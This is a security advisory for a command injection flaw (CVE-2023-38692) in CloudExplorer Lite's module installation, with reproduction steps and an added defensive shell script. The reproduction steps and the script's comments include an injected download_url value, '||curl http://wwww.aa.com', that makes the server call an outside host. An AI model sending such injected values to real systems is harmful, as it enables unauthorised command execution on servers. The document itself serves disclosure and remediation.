
Command injection vulnerability in module management function in CloudExplorer Lite

Moderate
baixin513 published GHSA-7wrc-f42m-9v5w Aug 3, 2023

Package

maven com.fit2cloud (Maven)

Affected versions

versions: <= 1.3.0

Patched versions

1.3.1

Description

Impact

Command injection vulnerability in the installation function of module management.

The reproduction steps are as follows:

  1. The installation function in module management is the install method of ModuleManageController. The source is at: https://github.com/CloudExplorer-Dev/CloudExplorer-Lite/blob/v1.3.0/framework/management-center/backend/src/main/java/com/fit2cloud/controller/ModuleManageController.java


  2. It downloads the installation package from the specified URL using the updateModule function in run core. sh to complete the installation.


  3. The updateModule function in run core. sh is shown below. Because the URL is not filtered, the following string can be passed in to cause command injection:

||curl http://wwww.aa.com

  4. As a result, updateModule executes the following command:

curl -SL ||curl http://wwww.aa.com -o /opt/cloudexplorer/downloads/$_file || exit 1


  5. Calling this interface with the download_url parameter set to ||curl http://wwww.aa.com makes the backend host execute curl http://wwww.aa.com; here http://wwww.aa.com is the dnslog address.

  6. After the request is sent, dnslog receives the request, proving that the backend host executed the command curl http://wwww.aa.com.


Affected versions: <= 1.3.0.
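The root cause described above is that the download URL reaches a shell command unvalidated, so shell operators inside it are interpreted. The following is an added example of the defensive pattern, not code from CloudExplorer-Lite or its run core. sh script; the function names, the permitted character set and the DRY_RUN switch are assumptions made for illustration. It validates the URL against a strict allowlist before use and hands it to curl as one quoted argument instead of splicing it into a command string.

```shell
#!/bin/sh
# Added example (not the project's script): strict URL validation plus safe
# argument passing for a module download step.

# is_safe_module_url URL
# Returns 0 only for http(s) URLs made entirely of characters that can never
# act as shell operators (no spaces, pipes, semicolons, backticks, $ or quotes).
# The allowed set is an illustrative choice, deliberately narrower than RFC 3986.
is_safe_module_url() {
    url="$1"
    case "$url" in
        http://*|https://*) ;;
        *) return 1 ;;
    esac
    # Strip every permitted character; anything left over is disallowed.
    leftover=$(printf '%s' "$url" | LC_ALL=C tr -d 'A-Za-z0-9._~:/?=&%-')
    [ -z "$leftover" ]
}

# download_module URL DEST
# Validates URL, then runs curl with URL and DEST as single quoted arguments.
# Because "$url" is one word to curl and is never re-parsed by the shell, a
# value such as '||curl http://attacker.example' cannot become a second command
# (and is rejected by the allowlist anyway). DRY_RUN=1 (the default here, an
# assumption for offline use) prints the command line instead of running it.
download_module() {
    url="$1"
    dest="$2"
    if ! is_safe_module_url "$url"; then
        echo "rejected module download URL" >&2
        return 1
    fi
    if [ "${DRY_RUN:-1}" = 1 ]; then
        printf 'curl -SL %s -o %s\n' "$url" "$dest"
        return 0
    fi
    curl -SL "$url" -o "$dest" || return 1
}
```

Usage: `download_module "https://releases.example.com/module.tar.gz" /opt/cloudexplorer/downloads/module.tar.gz` prints the curl command line in dry-run mode, while `download_module "||curl http://wwww.aa.com" /tmp/x` is rejected before any command is built. The allowlist check is the primary control; the quoting is defence in depth so that a validation gap still cannot turn URL content into shell syntax.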

Patches

The vulnerability has been fixed in v1.3.1.

Workarounds

It is recommended to upgrade the version to v1.3.1.

References

If you have any questions or comments about this advisory:

Open an issue in https://github.com/CloudExplorer-Dev/CloudExplorer-Lite
Email us at xin.bai@fit2cloud.com

Severity

Moderate

CVE ID

CVE-2023-38692
